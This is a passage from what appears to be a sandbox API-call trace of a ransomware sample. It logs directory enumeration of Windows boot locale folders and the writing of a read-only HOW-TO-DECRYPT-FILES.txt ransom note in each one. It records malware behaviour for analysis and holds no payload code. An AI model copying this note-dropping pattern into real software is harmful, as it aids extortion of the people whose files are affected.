lpFindFileData=0x364560) returned 0x3609e0 [0045.018] GetLastError () returned 0x12 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.018] GetLastError () returned 0x12 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.018] GetLastError () returned 0x12 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.018] GetLastError () returned 0x12 [0045.018] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.018] SetErrorMode (uMode=0x0) returned 0x1 [0045.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.018] GetLastError () returned 0x12 [0045.019] SetErrorMode (uMode=0x1) returned 0x0 [0045.019] GetFileAttributesExW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1c5a61c | out: lpFileInformation=0x1c5a61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240)) returned 1 [0045.019] GetLastError () returned 0x12 [0045.019] SetErrorMode (uMode=0x0) returned 0x1 [0045.019] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.019] GetLastError () returned 0x12 [0045.019] SetErrorMode (uMode=0x1) returned 0x0 [0045.019] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\hu-hu\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.019] GetLastError () returned 0x0 [0045.019] GetFileType (hFile=0x184) returned 0x1 [0045.020] SetErrorMode (uMode=0x0) returned 0x1 [0045.020] GetFileType (hFile=0x184) returned 0x1 [0045.020] WriteFile (in: hFile=0x184, lpBuffer=0x1c763a8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1c763a8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.020] GetLastError () returned 0x0 [0045.020] CloseHandle (hObject=0x184) returned 1 [0045.021] GetLastError () returned 0x0 [0045.021] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.021] GetLastError () returned 0x0 [0045.021] SetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.021] GetLastError () returned 0x0 [0045.021] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0045.021] GetLastError () returned 0x0 [0045.021] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.021] GetLastError () returned 0x0 [0045.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.021] GetLastError () returned 0x0 [0045.021] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0045.021] GetLastError () returned 0x0 [0045.021] SetErrorMode (uMode=0x1) returned 0x0 [0045.021] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.021] GetLastError () returned 0x0 [0045.021] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.021] GetLastError () returned 0x0 [0045.021] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.021] GetLastError () returned 0x0 [0045.021] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.021] GetLastError () returned 0x12 [0045.022] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.022] SetErrorMode (uMode=0x0) returned 0x1 [0045.022] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0045.022] GetLastError () returned 0x12 [0045.022] SetErrorMode (uMode=0x1) returned 0x0 [0045.022] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.022] GetLastError () returned 0x12 [0045.022] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.022] GetLastError () returned 0x12 [0045.022] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.022] GetLastError () returned 0x12 [0045.022] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.022] GetLastError () returned 0x12 [0045.022] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.022] SetErrorMode (uMode=0x0) returned 0x1 [0045.022] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.022] GetLastError () returned 0x12 [0045.022] SetErrorMode (uMode=0x1) returned 0x0 [0045.022] GetFileAttributesExW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1c790b0 | out: lpFileInformation=0x1c790b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0045.022] GetLastError () returned 0x12 [0045.022] SetErrorMode (uMode=0x0) returned 0x1 [0045.022] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.022] GetLastError () returned 0x12 [0045.022] SetErrorMode (uMode=0x1) returned 0x0 [0045.023] CreateFileW (lpFileName="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\it-it\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.023] GetLastError () returned 0x0 [0045.023] GetFileType (hFile=0x184) returned 0x1 [0045.023] SetErrorMode (uMode=0x0) returned 0x1 [0045.023] GetFileType (hFile=0x184) returned 0x1 [0045.023] WriteFile (in: hFile=0x184, lpBuffer=0x1c94e3c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1c94e3c*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.024] GetLastError () returned 0x0 [0045.024] CloseHandle (hObject=0x184) returned 1 [0045.024] GetLastError () returned 0x0 [0045.024] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.024] GetLastError () returned 0x0 [0045.024] SetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.024] GetLastError () returned 0x0 [0045.024] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0045.024] GetLastError () returned 0x0 [0045.024] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.024] GetLastError () returned 0x0 [0045.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.024] GetLastError () returned 0x0 [0045.024] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0045.024] GetLastError () returned 0x0 [0045.024] SetErrorMode (uMode=0x1) returned 0x0 [0045.024] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.025] GetLastError () returned 0x0 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.025] GetLastError () returned 0x0 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.025] GetLastError () returned 0x0 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.025] GetLastError () returned 0x12 [0045.025] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.025] SetErrorMode (uMode=0x0) returned 0x1 [0045.025] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP", lpFilePart=0x0) returned 0xd [0045.025] GetLastError () returned 0x12 [0045.025] SetErrorMode (uMode=0x1) returned 0x0 [0045.025] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.025] GetLastError () returned 0x12 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.025] GetLastError () returned 0x12 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.025] GetLastError () returned 0x12 [0045.025] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.025] GetLastError () returned 0x12 [0045.025] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.025] SetErrorMode (uMode=0x0) returned 0x1 [0045.026] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.026] GetLastError () returned 0x12 [0045.026] SetErrorMode (uMode=0x1) returned 0x0 [0045.026] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1c97b44 | out: lpFileInformation=0x1c97b44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40)) returned 1 [0045.026] GetLastError () returned 0x12 [0045.026] SetErrorMode (uMode=0x0) returned 0x1 [0045.026] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.026] GetLastError () returned 0x12 [0045.026] SetErrorMode (uMode=0x1) returned 0x0 [0045.026] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\ja-jp\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.027] GetLastError () returned 0x0 [0045.027] GetFileType (hFile=0x184) returned 0x1 [0045.027] SetErrorMode (uMode=0x0) returned 0x1 [0045.027] GetFileType (hFile=0x184) returned 0x1 [0045.027] WriteFile (in: hFile=0x184, lpBuffer=0x1cb37cc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1cb37cc*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.028] GetLastError () returned 0x0 [0045.028] CloseHandle (hObject=0x184) returned 1 [0045.028] GetLastError () returned 0x0 [0045.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.028] GetLastError () returned 0x0 [0045.028] SetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.028] GetLastError () returned 0x0 [0045.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0045.028] GetLastError () returned 0x0 [0045.028] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.028] GetLastError () returned 0x0 [0045.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.028] GetLastError () returned 0x0 [0045.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0045.028] GetLastError () returned 0x0 [0045.028] SetErrorMode (uMode=0x1) returned 0x0 [0045.028] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.028] GetLastError () returned 0x0 [0045.028] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.028] GetLastError () returned 0x0 [0045.028] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.028] GetLastError () returned 0x0 [0045.028] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.028] GetLastError () returned 0x12 [0045.028] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.029] SetErrorMode (uMode=0x0) returned 0x1 [0045.029] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0045.029] GetLastError () returned 0x12 [0045.029] SetErrorMode (uMode=0x1) returned 0x0 [0045.029] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.029] GetLastError () returned 0x12 [0045.029] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.029] GetLastError () returned 0x12 [0045.029] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.029] GetLastError () returned 0x12 [0045.029] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.029] GetLastError () returned 0x12 [0045.029] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.029] SetErrorMode (uMode=0x0) returned 0x1 [0045.029] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.029] GetLastError () returned 0x12 [0045.029] SetErrorMode (uMode=0x1) returned 0x0 [0045.029] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cb64d4 | out: lpFileInformation=0x1cb64d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5530d1c0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650)) returned 1 [0045.029] GetLastError () returned 0x12 [0045.029] SetErrorMode (uMode=0x0) returned 0x1 [0045.029] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.029] GetLastError () returned 0x12 [0045.029] SetErrorMode (uMode=0x1) returned 0x0 [0045.029] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\ko-kr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.030] GetLastError () returned 0x0 [0045.030] GetFileType (hFile=0x184) returned 0x1 [0045.030] SetErrorMode (uMode=0x0) returned 0x1 [0045.030] GetFileType (hFile=0x184) returned 0x1 [0045.030] WriteFile (in: hFile=0x184, lpBuffer=0x1cd215c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1cd215c*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.031] GetLastError () returned 0x0 [0045.031] CloseHandle (hObject=0x184) returned 1 [0045.031] GetLastError () returned 0x0 [0045.031] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.031] GetLastError () returned 0x0 [0045.031] SetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.031] GetLastError () returned 0x0 [0045.031] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0045.031] GetLastError () returned 0x0 [0045.031] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.031] GetLastError () returned 0x0 [0045.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.031] GetLastError () returned 0x0 [0045.031] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0045.031] GetLastError () returned 0x0 [0045.031] SetErrorMode (uMode=0x1) returned 0x0 [0045.031] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.031] GetLastError () returned 0x0 [0045.031] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.031] GetLastError () returned 0x0 [0045.031] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.031] GetLastError () returned 0x0 [0045.032] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.032] GetLastError () returned 0x12 [0045.032] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.032] SetErrorMode (uMode=0x0) returned 0x1 [0045.032] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0045.032] GetLastError () returned 0x12 [0045.032] SetErrorMode (uMode=0x1) returned 0x0 [0045.032] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.032] GetLastError () returned 0x12 [0045.032] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.032] GetLastError () returned 0x12 [0045.032] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.032] GetLastError () returned 0x12 [0045.032] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.032] GetLastError () returned 0x12 [0045.032] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.032] SetErrorMode (uMode=0x0) returned 0x1 [0045.032] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.032] GetLastError () returned 0x12 [0045.032] SetErrorMode (uMode=0x1) returned 0x0 [0045.032] GetFileAttributesExW (in: lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1cd4e64 | out: lpFileInformation=0x1cd4e64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55333320, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bf7f00, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850)) returned 1 [0045.032] GetLastError () returned 0x12 [0045.032] SetErrorMode (uMode=0x0) returned 0x1 [0045.032] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.032] GetLastError () returned 0x12 [0045.033] SetErrorMode (uMode=0x1) returned 0x0 [0045.033] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\nb-no\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.033] GetLastError () returned 0x0 [0045.033] GetFileType (hFile=0x184) returned 0x1 [0045.033] SetErrorMode (uMode=0x0) returned 0x1 [0045.033] GetFileType (hFile=0x184) returned 0x1 [0045.033] WriteFile (in: hFile=0x184, lpBuffer=0x1cf0aec*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1cf0aec*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.034] GetLastError () returned 0x0 [0045.034] CloseHandle (hObject=0x184) returned 1 [0045.034] GetLastError () returned 0x0 [0045.034] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.034] GetLastError () returned 0x0 [0045.034] SetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.034] GetLastError () returned 0x0 [0045.034] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0045.034] GetLastError () returned 0x0 [0045.034] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.034] GetLastError () returned 0x0 [0045.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.034] GetLastError () returned 0x0 [0045.034] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0045.034] GetLastError () returned 0x0 [0045.034] SetErrorMode (uMode=0x1) returned 0x0 [0045.034] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.035] GetLastError () returned 0x0 [0045.035] FindNextFileW (in: hFindFile=0x3609e0, 